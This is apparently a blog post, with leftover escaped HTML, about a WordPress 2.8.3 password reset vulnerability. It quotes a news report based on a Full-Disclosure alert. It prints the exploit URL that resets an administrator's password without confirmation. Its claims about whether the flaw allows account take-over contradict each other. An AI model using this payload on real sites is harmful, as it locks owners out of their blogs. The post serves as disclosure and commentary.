The latest one to become public is a simple but effective flaw, it doesn’t enable take-over but it does allow a prankster to lock an admin out of their blog by resetting the password.<\/p>\n
Developers of the widely used WordPress blogging software have released an update that fixes a vulnerability that let attackers take over accounts by resetting the administrator password.<\/p>\n
The bug in version 2.8.3 is trivial to exploit remotely using nothing more than a web browser and a specially manipulated link. Typically, requests to reset a password are handled using a registered email address. Using the special URL, the old password is removed and a new one generated in its place with no confirmation required, according to this alert published on the Full-Disclosure mailing list.<\/p>\n
The flaw lurks in some of the PHP code that fails to properly scrutinize user input when the password reset feature is invoked. Exploiting it is as easy is directing a web browser to a link that looks something like:\n<\/p><\/blockquote>\n
I actually saw the alert as it was published on Full-Disclosure, obviously anything to do with WordPress catches my attention.<\/p>\n
The exploit can be executed by running the following code on a WordPress 2.8.3 blog:<\/p>\n
http:\/\/www.domain.com\/wp-login.php?action=rp&key[]=<\/pre>\nSimple but effective.<\/p>\n